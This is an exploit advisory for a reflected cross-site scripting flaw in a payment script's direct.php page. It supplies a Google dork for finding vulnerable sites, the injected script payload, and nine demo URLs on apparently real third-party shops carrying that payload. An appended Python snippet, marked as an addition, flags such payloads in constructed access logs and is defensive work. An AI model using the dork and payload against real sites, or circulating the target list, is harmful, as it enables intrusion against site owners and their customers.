############In The Name Of God############
# Exploit Title : Virtual Freer Cross Site Scripting
# Exploit Author : R4SOUL
# Vendor Homepage : http://freer.ir/
# Google Dork : site:.ir inurl:direct.php?card=
# Date : 26 January 2016
# Tested On : Win 10 / Mozilla Firefox
###########################################
# Exploit:
# Search the dork, choose a target and add "'"<script>alert('R4SOUL')</script>" after the URL
# to see the vulnerability.
###########################################
#
# Demos :
# http://inet2.ir/direct.php?card=9&qty=1'"<script>alert('R4SOUL')</script>
# http://www.milanvpn50.tk/boy/direct.php?qty=1'"<script>alert('R4SOUL')</script>&card=16
# http://www.nextvpn.in/pay/direct.php?card=2&qty=1'"<script>alert('R4SOUL')</script>
# http://pay.freer.ir/direct.php?card=5&qty=1'"<script>alert('R4SOUL')</script>
# http://www.sabzandishan.ir/shop/direct.php?card=64&qty=1'"<script>alert('R4SOUL')</script>
# http://shop.mihannod.ir/direct.php?card=15&qty=1'"<script>alert('R4SOUL')</script>
# http://store.parseset.ir/direct.php?card=3&qty=1'"<script>alert('R4SOUL')</script>
# http://www.keriomaker020.in/buy/direct.php?card=1&qty=1'"<script>alert('R4SOUL')</script>
# http://tx166.ir/shop/direct.php?card=25&qty=1%27%22%3Cscript%3Ealert(%27R4SOUL%27)%3C/script%3E
###########################################
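# Added example (not part of the original advisory and not the vendor's code): a log check that
# flags direct.php requests whose card or qty value is not a plain integer, which is how the
# payloads in the demo URLs above look on the server side, raw or percent-encoded.
# Assumptions: card and qty are meant to be small integers; the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: card and qty are meant to be small integers, as in the demo URLs.
NUMERIC_PARAMS = ("card", "qty")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not taken from any real site.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2016:10:01:02 +0000] "GET /direct.php?card=9&qty=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jan/2016:10:01:09 +0000] "GET /shop/direct.php?card=25'
    '&qty=1%27%22%3Cscript%3Ealert(%27x%27)%3C/script%3E HTTP/1.1" 200 5188',
    '198.51.100.4 - - [26/Jan/2016:10:02:30 +0000] "GET /index.php?qty=abc HTTP/1.1" 200 900',
]


def suspicious_params(target):
    """Return {param: decoded_value} for non-integer card/qty sent to direct.php."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/direct.php"):
        return {}
    bad = {}
    # parse_qsl percent-decodes, so raw and %-encoded payloads are treated alike.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,6}", value):
            bad[name] = value
    return bad


def scan(log_lines):
    """Yield (line_number, findings) for every log line that needs review."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = suspicious_params(match.group(1))
            if findings:
                yield number, findings


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {findings}")
```

# The same integer-only rule, enforced in direct.php before the values are echoed into the page,
# is the corresponding server-side input check.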